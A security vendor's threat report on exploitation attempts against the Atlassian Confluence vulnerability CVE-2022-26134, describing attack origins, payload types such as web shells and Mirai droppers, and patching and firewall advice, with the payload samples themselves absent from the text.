Threat Spotlight: Attempts to exploit Atlassian Confluence zero day
On June 2, 2022, Volexity performed a coordinated disclosure of a zero-day vulnerability in Atlassian Confluence being exploited in the wild, CVE-2022-26134. Since the original disclosure and subsequent publication of various proofs of concept, Barracuda researchers have analyzed data from our installations worldwide and discovered a large number of attempts to exploit this vulnerability. The exploit attempts range from benign reconnaissance to some relatively complex attempts to infect systems with DDoS botnet malware and cryptominers.
Barracuda researchers have seen a steady flow of attacks over time, with some spikes, notably one on June 13. The expectation is that we will continue to see a significant amount of such attempts to continue for the time being.
Atlassian Confluence zero day — Atlassian Confluence is a tool that provides collaborative documentation. On June 2, information about what is now known as CVE-2022-26134 was publicly released. Over the next weekend, the vulnerability had been used by various threat actors in assaults, and in no-time malicious actors became aware of it.
The vulnerability allows unauthenticated, remote attackers to create new administrative accounts, execute privileged commands, and in turn seize control of the servers.
Exploitation attempts primarily originated from IP addresses in Russia, followed by the U.S., India, Netherlands, and Germany. As seen in previous research, the attacks seen originating from U.S. IP addresses are primarily from cloud providers. Similarly, for Germany, most attacks were from hosting providers.
Let’s warm up by looking at some of the more “benign” payloads that we saw.
Moving on to the web shells, the below is an example of an attempt to drop a web shell that was seen in our samples.
This web shell is almost an exact copy of a sample web shell from “The Art of Network Penetration Testing” by Royce Davis.
The next example is one of the more immediately destructive attempts to perform malicious actions.
Payloads dropping Mirai malware
We also saw a number of attempts to infect Confluence servers with malware. Threat actors are always looking for new vulnerabilities to exploit in their attempts to grow their botnets. Let’s look at a few examples of this.
Looking at VirusTotal shows that a number of security vendors have classified this as malware, and the site is known for hosting other Mirai downloads as well.
This is another straightforward example of an attempted insertion of the Mirai DDoS malware:
How to protect against these types of attacks
As noted earlier, the interest level in this vulnerability remains steady with occasional spikes, and our researchers expect to see scanning and attempts to exploit them for some time. Because interest from cybercriminals is so high, it’s important to take steps to protect your systems.
- Patching — The ideal time to patch is now, especially if the system is internet-facing in any way.
- Web application firewall —Placing a web application firewall in front of such systems will add to defense in depth against zero-day attacks and other vulnerabilities.
In part 2 of this report, we’ll take a closer look at the cryptominers that we have been seeing and dive a bit deeper into some interesting competitive behavior from one of them.